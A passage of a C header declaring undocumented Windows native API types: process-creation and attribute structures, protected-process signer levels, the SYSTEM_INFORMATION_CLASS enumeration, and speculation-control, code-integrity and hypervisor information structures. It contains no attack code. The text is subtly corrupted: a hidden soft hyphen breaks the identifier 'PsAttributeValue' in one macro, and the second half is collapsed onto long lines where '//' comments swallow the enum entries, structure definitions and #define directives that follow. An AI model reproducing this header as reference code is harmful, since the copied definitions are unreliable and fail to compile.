    PS_MITIGATION_OPTION_RESTRICT_CORE_SHARING,
    PS_MITIGATION_OPTION_FSCTL_SYSTEM_CALL_DISABLE
} PS_MITIGATION_OPTION;

typedef enum _PS_CREATE_STATE {
    PsCreateInitialState,
    PsCreateFailOnFileOpen,
    PsCreateFailOnSectionCreate,
    PsCreateFailExeFormat,
    PsCreateFailMachineMismatch,
    PsCreateFailExeName,
    PsCreateSuccess,
    PsCreateMaximumStates
} PS_CREATE_STATE;

typedef struct _PS_CREATE_INFO {
    SIZE_T Size;
    PS_CREATE_STATE State;
    union {
        struct {
            union {
                ULONG InitFlags;
                struct {
                    UCHAR WriteOutputOnExit : 1;
                    UCHAR DetectManifest : 1;
                    UCHAR IFEOSkipDebugger : 1;
                    UCHAR IFEODoNotPropagateKeyState : 1;
                    UCHAR SpareBits1 : 4;
                    UCHAR SpareBits2 : 8;
                    USHORT ProhibitedImageCharacteristics : 16;
                };
            };
            ACCESS_MASK AdditionalFileAccess;
        } InitState;
        struct {
            HANDLE FileHandle;
        } FailSection;
        struct {
            USHORT DllCharacteristics;
        } ExeFormat;
        struct {
            HANDLE IFEOKey;
        } ExeName;
        struct {
            union {
                ULONG OutputFlags;
                struct {
                    UCHAR ProtectedProcess : 1;
                    UCHAR AddressSpaceOverride : 1;
                    UCHAR DevOverrideEnabled : 1;
                    UCHAR ManifestDetected : 1;
                    UCHAR ProtectedProcessLight : 1;
                    UCHAR SpareBits1 : 3;
                    UCHAR SpareBits2 : 8;
                    USHORT SpareBits3 : 16;
                };
            };
            HANDLE FileHandle;
            HANDLE SectionHandle;
            ULONGLONG UserProcessParametersNative;
            ULONG UserProcessParametersWow64;
            ULONG CurrentParameterFlags;
            ULONGLONG PebAddressNative;
            ULONG PebAddressWow64;
            ULONGLONG ManifestAddress;
            ULONG ManifestSize;
        } SuccessState;
    };
} PS_CREATE_INFO, *PPS_CREATE_INFO;

typedef struct _PS_ATTRIBUTE {
    ULONG Attribute;
    SIZE_T Size;
    union {
        ULONG Value;
        PVOID ValuePtr;
    };
    PSIZE_T ReturnLength;
} PS_ATTRIBUTE, *PPS_ATTRIBUTE;

typedef struct _PS_ATTRIBUTE_LIST {
    SIZE_T TotalLength;
    PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;

typedef enum _PS_PROTECTED_TYPE {
    PsProtectedTypeNone,
    PsProtectedTypeProtectedLight,
    PsProtectedTypeProtected,
    PsProtectedTypeMax
} PS_PROTECTED_TYPE;

typedef enum _PS_PROTECTED_SIGNER {
    PsProtectedSignerNone,
    PsProtectedSignerAuthenticode,
    PsProtectedSignerCodeGen,
    PsProtectedSignerAntimalware,
    PsProtectedSignerLsa,
    PsProtectedSignerWindows,
    PsProtectedSignerWinTcb,
    PsProtectedSignerWinSystem,
    PsProtectedSignerApp,
    PsProtectedSignerMax
} PS_PROTECTED_SIGNER;

#define PS_PROTECTED_SIGNER_MASK    0xFF
#define PS_PROTECTED_AUDIT_MASK     0x08
#define PS_PROTECTED_TYPE_MASK      0x07

// from ph2
#define PsProtectedValue(aSigner, aAudit, aType) ( \
    (((aSigner) & PS_PROTECTED_SIGNER_MASK) << 4) | \
    (((aAudit) & PS_PROTECTED_AUDIT_MASK) << 3) | \
    ((aType) & PS_PROTECTED_TYPE_MASK)\
    )

#define InitializePsProtection(aProtectionLevelPtr, aSigner, aAudit, aType) { \
    (aProtectionLevelPtr)->Signer = aSigner; \
    (aProtectionLevelPtr)->Audit = aAudit; \
    (aProtectionLevelPtr)->Type = aType; \
}

typedef struct _PS_PROTECTION {
    union {
        UCHAR Level;
        struct {
            UCHAR Type : 3;
            UCHAR Audit : 1;
            UCHAR Signer : 4;
        };
    };
} PS_PROTECTION, *PPS_PROTECTION;

// begin_rev
#define PS_ATTRIBUTE_NUMBER_MASK    0x0000ffff
#define PS_ATTRIBUTE_THREAD         0x00010000
#define PS_ATTRIBUTE_INPUT          0x00020000
#define PS_ATTRIBUTE_ADDITIVE       0x00040000
// end_rev

typedef enum _PS_ATTRIBUTE_NUM {
    PsAttributeParentProcess,
    PsAttributeDebugPort,
    PsAttributeToken,
    PsAttributeClientId,
    PsAttributeTebAddress,
    PsAttributeImageName,
    PsAttributeImageInfo,
    PsAttributeMemoryReserve,
    PsAttributePriorityClass,
    PsAttributeErrorMode,
    PsAttributeStdHandleInfo,
    PsAttributeHandleList,
    PsAttributeGroupAffinity,
    PsAttributePreferredNode,
    PsAttributeIdealProcessor,
    PsAttributeUmsThread,
    PsAttributeMitigationOptions,
    PsAttributeProtectionLevel,
    PsAttributeSecureProcess,
    PsAttributeJobList,
    PsAttributeChildProcessPolicy,
    PsAttributeAllApplicationPackagesPolicy,
    PsAttributeWin32kFilter,
    PsAttributeSafeOpenPromptOriginClaim,
    PsAttributeBnoIsolation,
    PsAttributeDesktopAppPolicy,
    PsAttributeChpe,
    PsAttributeMitigationAuditOptions,
    PsAttributeMachineType,
    PsAttributeComponentFilter,
    PsAttributeEnableOptionalXStateFeatures,
    PsAttributeSupportedMachines,
    PsAttributeSveVectorLength,
    PsAttributeMax
} PS_ATTRIBUTE_NUM;

#define PsAttributeValue(Number, Thread, Input, Unknown) \
    (((Number) & PS_ATTRIBUTE_NUMBER_MASK) | \
    ((Thread) ? PS_ATTRIBUTE_THREAD : 0) | \
    ((Input) ? PS_ATTRIBUTE_INPUT : 0) | \
    ((Unknown) ? PS_ATTRIBUTE_ADDITIVE : 0))

#define PS_ATTRIBUTE_PARENT_PROCESS \
    PsAttributeValue(PsAttributeParentProcess, FALSE, TRUE, TRUE)
// slot 1 is named PsAttributeDebugPort in the enum above
#define PS_ATTRIBUTE_DEBUG_OBJECT \
    PsAttributeValue(PsAttributeDebugPort, FALSE, TRUE, TRUE)
#define PS_ATTRIBUTE_TOKEN \
    PsAttributeValue(PsAttributeToken, FALSE, TRUE, TRUE)
#define PS_ATTRIBUTE_CLIENT_ID \
    PsAttributeValue(PsAttributeClientId, TRUE, FALSE, FALSE)
#define PS_ATTRIBUTE_TEB_ADDRESS \
    PsAttributeValue(PsAttributeTebAddress, TRUE, FALSE, FALSE)
#define PS_ATTRIBUTE_IMAGE_NAME \
    PsAttributeValue(PsAttributeImageName, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_IMAGE_INFO \
    PsAttributeValue(PsAttributeImageInfo, FALSE, FALSE, FALSE)
#define PS_ATTRIBUTE_MEMORY_RESERVE \
    PsAtt­ributeValue(PsAttributeMemoryReserve, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_PRIORITY_CLASS \
    PsAttributeValue(PsAttributePriorityClass, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_ERROR_MODE \
    PsAttributeValue(PsAttributeErrorMode, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_STD_HANDLE_INFO \
    PsAttributeValue(PsAttributeStdHandleInfo, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_HANDLE_LIST \
    PsAttributeValue(PsAttributeHandleList, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_GROUP_AFFINITY \
    PsAttributeValue(PsAttributeGroupAffinity, TRUE, TRUE, FALSE)
#define PS_ATTRIBUTE_PREFERRED_NODE \
    PsAttributeValue(PsAttributePreferredNode, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_IDEAL_PROCESSOR \
    PsAttributeValue(PsAttributeIdealProcessor, TRUE, TRUE, FALSE)
#define PS_ATTRIBUTE_UMS_THREAD \
    PsAttributeValue(PsAttributeUmsThread, TRUE, TRUE, FALSE)
#define PS_ATTRIBUTE_MITIGATION_OPTIONS \
    PsAttributeValue(PsAttributeMitigationOptions, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_PROTECTION_LEVEL \
    PsAttributeValue(PsAttributeProtectionLevel, FALSE, TRUE, TRUE)
#define PS_ATTRIBUTE_SECURE_PROCESS \
    PsAttributeValue(PsAttributeSecureProcess, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_JOB_LIST \
    PsAttributeValue(PsAttributeJobList, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_CHILD_PROCESS_POLICY \
    PsAttributeValue(PsAttributeChildProcessPolicy, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_ALL_APPLICATION_PACKAGES_POLICY \
    PsAttributeValue(PsAttributeAllApplicationPackagesPolicy, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_WIN32K_FILTER \
    PsAttributeValue(PsAttributeWin32kFilter, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_SAFE_OPEN_PROMPT_ORIGIN_CLAIM \
    PsAttributeValue(PsAttributeSafeOpenPromptOriginClaim, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_BNO_ISOLATION \
    PsAttributeValue(PsAttributeBnoIsolation, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_DESKTOP_APP_POLICY \
    PsAttributeValue(PsAttributeDesktopAppPolicy, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_CHPE \
    PsAttributeValue(PsAttributeChpe, FALSE, TRUE, TRUE)
#define PS_ATTRIBUTE_MITIGATION_AUDIT_OPTIONS \
    PsAttributeValue(PsAttributeMitigationAuditOptions, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_MACHINE_TYPE \
    PsAttributeValue(PsAttributeMachineType, FALSE, TRUE, TRUE)
#define PS_ATTRIBUTE_COMPONENT_FILTER \
    PsAttributeValue(PsAttributeComponentFilter, FALSE, TRUE, FALSE)
#define PS_ATTRIBUTE_ENABLE_OPTIONAL_XSTATE_FEATURES \
    PsAttributeValue(PsAttributeEnableOptionalXStateFeatures, TRUE, TRUE, FALSE)

#define RTL_USER_PROC_PARAMS_NORMALIZED                 0x00000001
#define RTL_USER_PROC_PROFILE_USER                      0x00000002
#define RTL_USER_PROC_PROFILE_KERNEL                    0x00000004
#define RTL_USER_PROC_PROFILE_SERVER                    0x00000008
#define RTL_USER_PROC_RESERVE_1MB                       0x00000020
#define RTL_USER_PROC_RESERVE_16MB                      0x00000040
#define RTL_USER_PROC_CASE_SENSITIVE                    0x00000080
#define RTL_USER_PROC_DISABLE_HEAP_DECOMMIT             0x00000100
#define RTL_USER_PROC_DLL_REDIRECTION_LOCAL             0x00001000
#define RTL_USER_PROC_APP_MANIFEST_PRESENT              0x00002000
#define RTL_USER_PROC_IMAGE_KEY_MISSING                 0x00004000
#define RTL_USER_PROC_DEV_OVERRIDE_ENABLED              0x00008000
#define RTL_USER_PROC_OPTIN_PROCESS                     0x00020000
#define RTL_USER_PROC_SESSION_OWNER                     0x00040000
#define RTL_USER_PROC_HANDLE_USER_CALLBACK_EXCEPTIONS   0x00080000
#define RTL_USER_PROC_PROTECTED_PROCESS                 0x00400000
#define RTL_USER_PROC_SECURE_PROCESS                    0x80000000

typedef struct _PROCESS_HANDLE_TRACING_ENABLE {
    ULONG Flags;
} PROCESS_HANDLE_TRACING_ENABLE, * PPROCESS_HANDLE_TRACING_ENABLE;

#define PROCESS_HANDLE_TRACING_MAX_SLOTS 0x20000

typedef struct _PROCESS_HANDLE_TRACING_ENABLE_EX {
    ULONG Flags;
    ULONG TotalSlots;
} PROCESS_HANDLE_TRACING_ENABLE_EX, * PPROCESS_HANDLE_TRACING_ENABLE_EX;

#define PROCESS_HANDLE_TRACING_MAX_STACKS 16

#define PROCESS_HANDLE_TRACE_TYPE_OPEN      1
#define PROCESS_HANDLE_TRACE_TYPE_CLOSE     2
#define PROCESS_HANDLE_TRACE_TYPE_BADREF    3

typedef struct _PROCESS_HANDLE_TRACING_ENTRY {
    HANDLE Handle;
    CLIENT_ID ClientId;
    ULONG Type;
    PVOID Stacks[PROCESS_HANDLE_TRACING_MAX_STACKS];
} PROCESS_HANDLE_TRACING_ENTRY, * PPROCESS_HANDLE_TRACING_ENTRY;

typedef struct _PROCESS_HANDLE_TRACING_QUERY {
    HANDLE Handle;
    ULONG TotalTraces;
    PROCESS_HANDLE_TRACING_ENTRY HandleTrace[1];
} PROCESS_HANDLE_TRACING_QUERY, * PPROCESS_HANDLE_TRACING_QUERY;

typedef struct _PROCESS_WS_WATCH_INFORMATION {
    PVOID FaultingPc;
    PVOID FaultingVa;
} PROCESS_WS_WATCH_INFORMATION, * PPROCESS_WS_WATCH_INFORMATION;

typedef struct _PROCESS_WS_WATCH_INFORMATION_EX {
    PROCESS_WS_WATCH_INFORMATION BasicInfo;
    ULONG_PTR FaultingThreadId;
    ULONG_PTR Flags;
} PROCESS_WS_WATCH_INFORMATION_EX, * PPROCESS_WS_WATCH_INFORMATION_EX;

typedef struct _PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION {
    ULONG Version;
    ULONG Reserved;
    PVOID Callback;
} PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION, * PPROCESS_INSTRUMENTATION_CALLBACK_INFORMATION;

/*
** Processes END
*/

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemBasicInformation = 0,
    SystemProcessorInformation = 1,
    SystemPerformanceInformation = 2,
    SystemTimeOfDayInformation = 3,
    SystemPathInformation = 4,
    SystemProcessInformation = 5,
    SystemCallCountInformation = 6,
    SystemDeviceInformation = 7,
    SystemProcessorPerformanceInformation = 8,
    SystemFlagsInformation = 9,
    SystemCallTimeInformation = 10,
    SystemModuleInformation = 11,
    SystemLocksInformation = 12,
    SystemStackTraceInformation = 13,
    SystemPagedPoolInformation = 14,
    SystemNonPagedPoolInformation = 15,
    SystemHandleInformation = 16,
    SystemObjectInformation = 17,
    SystemPageFileInformation = 18,
    SystemVdmInstemulInformation = 19,
    SystemVdmBopInformation = 20,
    SystemFileCacheInformation = 21,
    SystemPoolTagInformation = 22,
    SystemInterruptInformation = 23,
    SystemDpcBehaviorInformation = 24,
    SystemFullMemoryInformation = 25,
    SystemLoadGdiDriverInformation = 26,
    SystemUnloadGdiDriverInformation = 27,
    SystemTimeAdjustmentInformation = 28,
    SystemSummaryMemoryInformation = 29,
    SystemMirrorMemoryInformation = 30,
    SystemPerformanceTraceInformation = 31,
    SystemObsolete0 = 32,
    SystemExceptionInformation = 33,
    SystemCrashDumpStateInformation = 34,
    SystemKernelDebuggerInformation = 35,
    SystemContextSwitchInformation = 36,
    SystemRegistryQuotaInformation = 37,
    SystemExtendServiceTableInformation = 38,
    SystemPrioritySeperation = 39,
    SystemVerifierAddDriverInformation = 40,
    SystemVerifierRemoveDriverInformation = 41,
    SystemProcessorIdleInformation = 42,
    SystemLegacyDriverInformation = 43,
    SystemCurrentTimeZoneInformation = 44,
    SystemLookasideInformation = 45,
    SystemTimeSlipNotification = 46,
    SystemSessionCreate = 47,
    SystemSessionDetach = 48,
    SystemSessionInformation = 49,
    SystemRangeStartInformation = 50,
    SystemVerifierInformation = 51,
    SystemVerifierThunkExtend = 52,
    SystemSessionProcessInformation = 53,
    SystemLoadGdiDriverInSystemSpace = 54,
    SystemNumaProcessorMap = 55,
    SystemPrefetcherInformation = 56,
    SystemExtendedProcessInformation = 57,
    SystemRecommendedSharedDataAlignment = 58,
    SystemComPlusPackage = 59,
    SystemNumaAvailableMemory = 60,
    SystemProcessorPowerInformation = 61,
    SystemEmulationBasicInformation = 62,
SystemEmulationProcessorInformation = 63, SystemExtendedHandleInformation = 64, SystemLostDelayedWriteInformation = 65, SystemBigPoolInformation = 66, SystemSessionPoolTagInformation = 67, SystemSessionMappedViewInformation = 68, SystemHotpatchInformation = 69, SystemObjectSecurityMode = 70, SystemWatchdogTimerHandler = 71, SystemWatchdogTimerInformation = 72, SystemLogicalProcessorInformation = 73, SystemWow64SharedInformationObsolete = 74, SystemRegisterFirmwareTableInformationHandler = 75, SystemFirmwareTableInformation = 76, SystemModuleInformationEx = 77, SystemVerifierTriageInformation = 78, SystemSuperfetchInformation = 79, SystemMemoryListInformation = 80, SystemFileCacheInformationEx = 81, SystemThreadPriorityClientIdInformation = 82, SystemProcessorIdleCycleTimeInformation = 83, SystemVerifierCancellationInformation = 84, SystemProcessorPowerInformationEx = 85, SystemRefTraceInformation = 86, SystemSpecialPoolInformation = 87, SystemProcessIdInformation = 88, SystemErrorPortInformation = 89, SystemBootEnvironmentInformation = 90, SystemHypervisorInformation = 91, SystemVerifierInformationEx = 92, SystemTimeZoneInformation = 93, SystemImageFileExecutionOptionsInformation = 94, SystemCoverageInformation = 95, SystemPrefetchPatchInformation = 96, SystemVerifierFaultsInformation = 97, SystemSystemPartitionInformation = 98, SystemSystemDiskInformation = 99, SystemProcessorPerformanceDistribution = 100, SystemNumaProximityNodeInformation = 101, SystemDynamicTimeZoneInformation = 102, SystemCodeIntegrityInformation = 103, SystemProcessorMicrocodeUpdateInformation = 104, SystemProcessorBrandString = 105, SystemVirtualAddressInformation = 106, SystemLogicalProcessorAndGroupInformation = 107, SystemProcessorCycleTimeInformation = 108, SystemStoreInformation = 109, SystemRegistryAppendString = 110, SystemAitSamplingValue = 111, SystemVhdBootInformation = 112, SystemCpuQuotaInformation = 113, SystemNativeBasicInformation = 114, SystemErrorPortTimeouts = 115, 
SystemLowPriorityIoInformation = 116, SystemBootEntropyInformation = 117, SystemVerifierCountersInformation = 118, SystemPagedPoolInformationEx = 119, SystemSystemPtesInformationEx = 120, SystemNodeDistanceInformation = 121, SystemAcpiAuditInformation = 122, SystemBasicPerformanceInformation = 123, SystemQueryPerformanceCounterInformation = 124, SystemSessionBigPoolInformation = 125, SystemBootGraphicsInformation = 126, SystemScrubPhysicalMemoryInformation = 127, SystemBadPageInformation = 128, SystemProcessorProfileControlArea = 129, SystemCombinePhysicalMemoryInformation = 130, SystemEntropyInterruptTimingInformation = 131, SystemConsoleInformation = 132, SystemPlatformBinaryInformation = 133, SystemPolicyInformation = 134, SystemHypervisorProcessorCountInformation = 135, SystemDeviceDataInformation = 136, SystemDeviceDataEnumerationInformation = 137, SystemMemoryTopologyInformation = 138, SystemMemoryChannelInformation = 139, SystemBootLogoInformation = 140, SystemProcessorPerformanceInformationEx = 141, SystemSpare0 = 142, SystemSecureBootPolicyInformation = 143, SystemPageFileInformationEx = 144, SystemSecureBootInformation = 145, SystemEntropyInterruptTimingRawInformation = 146, SystemPortableWorkspaceEfiLauncherInformation = 147, SystemFullProcessInformation = 148, SystemKernelDebuggerInformationEx = 149, SystemBootMetadataInformation = 150, SystemSoftRebootInformation = 151, SystemElamCertificateInformation = 152, SystemOfflineDumpConfigInformation = 153, SystemProcessorFeaturesInformation = 154, SystemRegistryReconciliationInformation = 155, SystemEdidInformation = 156, SystemManufacturingInformation = 157, SystemEnergyEstimationConfigInformation = 158, SystemHypervisorDetailInformation = 159, SystemProcessorCycleStatsInformation = 160, SystemVmGenerationCountInformation = 161, SystemTrustedPlatformModuleInformation = 162, SystemKernelDebuggerFlags = 163, SystemCodeIntegrityPolicyInformation = 164, SystemIsolatedUserModeInformation = 165, 
SystemHardwareSecurityTestInterfaceResultsInformation = 166, SystemSingleModuleInformation = 167, SystemAllowedCpuSetsInformation = 168, SystemVsmProtectionInformation = 169, //ex SystemDmaProtectionInformation SystemInterruptCpuSetsInformation = 170, SystemSecureBootPolicyFullInformation = 171, SystemCodeIntegrityPolicyFullInformation = 172, SystemAffinitizedInterruptProcessorInformation = 173, SystemRootSiloInformation = 174, SystemCpuSetInformation = 175, SystemCpuSetTagInformation = 176, SystemWin32WerStartCallout = 177, SystemSecureKernelProfileInformation = 178, SystemCodeIntegrityPlatformManifestInformation = 179, SystemInterruptSteeringInformation = 180, SystemSupportedProcessorArchitectures = 181, SystemMemoryUsageInformation = 182, SystemCodeIntegrityCertificateInformation = 183, SystemPhysicalMemoryInformation = 184, SystemControlFlowTransition = 185, SystemKernelDebuggingAllowed = 186, SystemActivityModerationExeState = 187, SystemActivityModerationUserSettings = 188, SystemCodeIntegrityPoliciesFullInformation = 189, SystemCodeIntegrityUnlockInformation = 190, SystemIntegrityQuotaInformation = 191, SystemFlushInformation = 192, SystemProcessorIdleMaskInformation = 193, SystemSecureDumpEncryptionInformation = 194, SystemWriteConstraintInformation = 195, SystemKernelVaShadowInformation = 196, SystemHypervisorSharedPageInformation = 197, SystemFirmwareBootPerformanceInformation = 198, SystemCodeIntegrityVerificationInformation = 199, SystemFirmwarePartitionInformation = 200, SystemSpeculationControlInformation = 201, SystemDmaGuardPolicyInformation = 202, SystemEnclaveLaunchControlInformation = 203, SystemWorkloadAllowedCpuSetsInformation = 204, SystemCodeIntegrityUnlockModeInformation = 205, SystemLeapSecondInformation = 206, SystemFlags2Information = 207, SystemSecurityModelInformation = 208, SystemCodeIntegritySyntheticCacheInformation = 209, SystemFeatureConfigurationInformation = 210, SystemFeatureConfigurationSectionInformation = 211, 
SystemFeatureUsageSubscriptionInformation = 212, SystemSecureSpeculationControlInformation = 213, SystemSpacesBootInformation = 214, SystemFwRamdiskInformation = 215, SystemWheaIpmiHardwareInformation = 216, SystemDifSetRuleClassInformation = 217, SystemDifClearRuleClassInformation = 218, SystemDifApplyPluginVerificationOnDriver = 219, SystemDifRemovePluginVerificationOnDriver = 220, SystemShadowStackInformation = 221, SystemBuildVersionInformation = 222, SystemPoolLimitInformation = 223, SystemCodeIntegrityAddDynamicStore = 224, SystemCodeIntegrityClearDynamicStores = 225, SystemDifPoolTrackingInformation = 226, SystemPoolZeroingInformation = 227, SystemDpcWatchdogInformation = 228, SystemDpcWatchdogInformation2 = 229, SystemSupportedProcessorArchitectures2 = 230, SystemSingleProcessorRelationshipInformation = 231, SystemXfgCheckFailureInformation = 232, SystemIommuStateInformation = 233, SystemHypervisorMinrootInformation = 234, SystemHypervisorBootPagesInformation = 235, SystemPointerAuthInformation = 236, SystemSecureKernelDebuggerInformation = 237, SystemOriginalImageFeatureInformation = 238, SystemMemoryNumaInformation = 239, SystemMemoryNumaPerformanceInformation = 240, SystemCodeIntegritySignedPoliciesFullInformation = 241, SystemSecureSecretsInformation = 242, SystemTrustedAppsRuntimeInformation = 243, SystemBadPageInformationEx = 244, SystemResourceDeadlockTimeout = 245, SystemBreakOnContextUnwindFailureInformation = 246, SystemOslRamdiskInformation = 247, SystemCodeIntegrityPolicyManagementInformation = 248, SystemMemoryNumaCacheInformation = 249, SystemProcessorFeaturesBitMapInformation = 250, SystemRefTraceInformationEx = 251, SystemBasicProcessInformation = 252, SystemHandleCountInformation = 253, MaxSystemInfoClass } SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS; typedef struct _SYSTEM_VSM_PROTECTION_INFORMATION { CHAR DmaProtectionsAvailable; CHAR DmaProtectionsInUse; CHAR HardwareMbecAvailable; CHAR ApicVirtualizationAvailable; } 
SYSTEM_VSM_PROTECTION_INFORMATION, * PSYSTEM_VSM_PROTECTION_INFORMATION; //msdn.microsoft.com/en-us/library/windows/desktop/ms724509(v=vs.85).aspx typedef struct _SYSTEM_SPECULATION_CONTROL_INFORMATION { union { ULONG Flags; struct { ULONG BpbEnabled : 1; ULONG BpbDisabledSystemPolicy : 1; ULONG BpbDisabledNoHardwareSupport : 1; ULONG SpecCtrlEnumerated : 1; ULONG SpecCmdEnumerated : 1; ULONG IbrsPresent : 1; ULONG StibpPresent : 1; ULONG SmepPresent : 1; ULONG SpeculativeStoreBypassDisableAvailable : 1; ULONG SpeculativeStoreBypassDisableSupported : 1; ULONG SpeculativeStoreBypassDisabledSystemWide : 1; ULONG SpeculativeStoreBypassDisabledKernel : 1; ULONG SpeculativeStoreBypassDisableRequired : 1; ULONG BpbDisabledKernelToUser : 1; ULONG SpecCtrlRetpolineEnabled : 1; ULONG SpecCtrlImportOptimizationEnabled : 1; ULONG EnhancedIbrs : 1; ULONG HvL1tfStatusAvailable : 1; ULONG HvL1tfProcessorNotAffected : 1; ULONG HvL1tfMigitationEnabled : 1; ULONG HvL1tfMigitationNotEnabled_Hardware : 1; ULONG HvL1tfMigitationNotEnabled_LoadOption : 1; ULONG HvL1tfMigitationNotEnabled_CoreScheduler : 1; ULONG EnhancedIbrsReported : 1; ULONG MdsHardwareProtected : 1; ULONG MbClearEnabled : 1; ULONG MbClearReported : 1; ULONG TsxCtrlStatus : 2; ULONG TsxCtrlReported : 1; ULONG TaaHardwareImmune : 1; ULONG Reserved : 1; } SpeculationControlFlags; }; } SYSTEM_SPECULATION_CONTROL_INFORMATION, *PSYSTEM_SPECULATION_CONTROL_INFORMATION; typedef struct _SYSTEM_SPECULATION_CONTROL_INFORMATION_V2 { union { ULONG Flags; struct { ULONG BpbEnabled : 1; ULONG BpbDisabledSystemPolicy : 1; ULONG BpbDisabledNoHardwareSupport : 1; ULONG SpecCtrlEnumerated : 1; ULONG SpecCmdEnumerated : 1; ULONG IbrsPresent : 1; ULONG StibpPresent : 1; ULONG SmepPresent : 1; ULONG SpeculativeStoreBypassDisableAvailable : 1; ULONG SpeculativeStoreBypassDisableSupported : 1; ULONG SpeculativeStoreBypassDisabledSystemWide : 1; ULONG SpeculativeStoreBypassDisabledKernel : 1; ULONG SpeculativeStoreBypassDisableRequired : 1; 
ULONG BpbDisabledKernelToUser : 1; ULONG SpecCtrlRetpolineEnabled : 1; ULONG SpecCtrlImportOptimizationEnabled : 1; ULONG EnhancedIbrs : 1; ULONG HvL1tfStatusAvailable : 1; ULONG HvL1tfProcessorNotAffected : 1; ULONG HvL1tfMigitationEnabled : 1; ULONG HvL1tfMigitationNotEnabled_Hardware : 1; ULONG HvL1tfMigitationNotEnabled_LoadOption : 1; ULONG HvL1tfMigitationNotEnabled_CoreScheduler : 1; ULONG EnhancedIbrsReported : 1; ULONG MdsHardwareProtected : 1; ULONG MbClearEnabled : 1; ULONG MbClearReported : 1; ULONG TsxCtrlStatus : 2; ULONG TsxCtrlReported : 1; ULONG TaaHardwareImmune : 1; ULONG Reserved : 1; } SpeculationControlFlags; }; union { ULONG Flags2; struct { ULONG SbdrSsdpHardwareProtected : 1; ULONG FbsdpHardwareProtected : 1; ULONG PsdpHardwareProtected : 1; ULONG FbClearEnabled : 1; ULONG FbClearReported : 1; ULONG BhbEnabled : 1; ULONG BhbDisabledSystemPolicy : 1; ULONG BhbDisabledNoHardwareSupport : 1; ULONG BranchConfusionStatus : 2; ULONG BranchConfusionReported : 1; ULONG RdclHardwareProtectedReported : 1; ULONG RdclHardwareProtected : 1; ULONG Reserved3 : 4; ULONG Reserved4 : 3; ULONG DivideByZeroReported : 1; ULONG DivideByZeroStatus : 1; ULONG Reserved5 : 3; ULONG Reserved : 7; } SpeculationControlFlags2; }; } SYSTEM_SPECULATION_CONTROL_INFORMATION_V2, * PSYSTEM_SPECULATION_CONTROL_INFORMATION_V2; typedef struct _SYSTEM_KERNEL_VA_SHADOW_INFORMATION { union { ULONG Flags; struct { ULONG KvaShadowEnabled : 1; ULONG KvaShadowUserGlobal : 1; ULONG KvaShadowPcid : 1; ULONG KvaShadowInvpcid : 1; ULONG KvaShadowRequired : 1; ULONG KvaShadowRequiredAvailable : 1; ULONG InvalidPteBit : 6; ULONG L1DataCacheFlushSupported : 1; ULONG L1TerminalFaultMitigationPresent : 1; ULONG Reserved : 18; } KvaShadowFlags; }; } SYSTEM_KERNEL_VA_SHADOW_INFORMATION, *PSYSTEM_KERNEL_VA_SHADOW_INFORMATION; typedef struct _SYSTEM_CODEINTEGRITY_INFORMATION { ULONG Length; ULONG CodeIntegrityOptions; } SYSTEM_CODEINTEGRITY_INFORMATION, *PSYSTEM_CODEINTEGRITY_INFORMATION; #define 
CODEINTEGRITY_OPTION_ENABLED 0x01 #define CODEINTEGRITY_OPTION_TESTSIGN 0x02 #define CODEINTEGRITY_OPTION_UMCI_ENABLED 0x04 #define CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED 0x08 #define CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED 0x10 #define CODEINTEGRITY_OPTION_TEST_BUILD 0x20 #define CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD 0x40 #define CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED 0x80 #define CODEINTEGRITY_OPTION_FLIGHT_BUILD 0x100 #define CODEINTEGRITY_OPTION_FLIGHTING_ENABLED 0x200 #define CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED 0x400 #define CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED 0x800 #define CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED 0x1000 #define CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED 0x2000 #define CODEINTEGRITY_OPTION_WHQL_ENFORCEMENT_ENABLED 0x4000 #define CODEINTEGRITY_OPTION_WHQL_AUDITMODE_ENABLED 0x8000 typedef struct _HV_DETAILS { ULONG Data[4]; } HV_DETAILS, * PHV_DETAILS; typedef struct _HV_VENDOR_AND_MAX_FUNCTION { ULONG MaxFunction; CHAR VendorName[12]; } HV_VENDOR_AND_MAX_FUNCTION, * PHV_VENDOR_AND_MAX_FUNCTION; typedef struct _SYSTEM_HYPERVISOR_DETAIL_INFORMATION { HV_DETAILS HvVendorAndMaxFunction; HV_DETAILS HypervisorInterface; HV_DETAILS HypervisorVersion; HV_DETAILS HvFeatures; HV_DETAILS HwFeatures; HV_DETAILS EnlightenmentInfo; HV_DETAILS ImplementationLimits; } SYSTEM_HYPERVISOR_DETAIL_INFORMATION, * PSYSTEM_HYPERVISOR_DETAIL_INFORMATION; typedef struct _SYSTEM_HYPERVISOR_QUERY_INFORMATION { BOOLEAN HypervisorConnected; BOOLEAN HypervisorDebuggingEnabled; BOOLEAN HypervisorPresent; BOOLEAN Spare0[5]; ULONGLONG EnabledEnlightenments; } SYSTEM_HYPERVISOR_QUERY_INFORMATION, * PSYSTEM_HYPERVISOR_QUERY_INFORMATION; typedef VOID(NTAPI 